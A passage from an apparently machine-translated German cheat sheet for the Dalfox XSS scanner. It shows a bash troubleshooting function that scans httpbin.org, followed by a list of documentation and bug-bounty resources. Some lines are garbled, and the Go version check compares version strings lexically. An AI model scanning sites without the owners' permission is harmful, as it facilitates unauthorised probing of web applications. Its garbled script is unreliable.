if ! curl -s --connect-timeout 5 https://httpbin.org/get > /dev/null; then
echo "❌ Network connectivity issues"
echo "Solution: Check internet connection and proxy settings"
return 1
fi
echo "✅ Network connectivity OK"
# Test basic functionality
echo "Testing basic Dalfox functionality..."
if dalfox url https://httpbin.org/get --timeout 10 --silence; then
echo "✅ Basic functionality test passed"
else
echo "❌ Basic functionality test failed"
echo "Solution: Check Dalfox installation and permissions"
return 1
fi
# Check for common issues
echo "Checking for common configuration issues..."
# Check Go version if installed via Go
if command -v go &> /dev/null; then
| local go_version=$(go version | awk '{print $3}' | sed 's/go//') | echo "Go version: $go_version"
if [[ "$go_version" < "1.19" ]]; then
echo "⚠️ Go version may be too old for latest Dalfox"
echo "Solution: Update Go to version 1.19 or later"
fi
fi
echo "Troubleshooting completed"
}
Run troubleshooting
troubleshoot_dalfox ```_
Ressourcen und Dokumentation
Offizielle Mittel
- Dalfox GitHub Repository - Hauptrepository und Dokumentation
- Dalfox Wiki - Umfassende Nutzungsanleitung
- Anmerkungen löschen - Aktuelle Updates und Änderungen
- Docker Hub - Offizielle Docker-Bilder
Gemeinschaftsmittel
- Dalfox-Diskussionen - Community Q&A; und Diskussionen
- Bug Reports - Problemverfolgung und Fehlerberichte
- Security Research Blog - Author's blog with security research
- XSS Research Papers - OWASP XSS Dokumentation
Integrationsbeispiele
- CI/CD Templates - Beispielkonfigurationen
- Burp Suite Extensions - Beispiele für die Integration von Burp
- Nuclei Templates - Komplementäre Sicherheitsvorlagen
- Bug Bounty Methodologies - XSS Jagdmethoden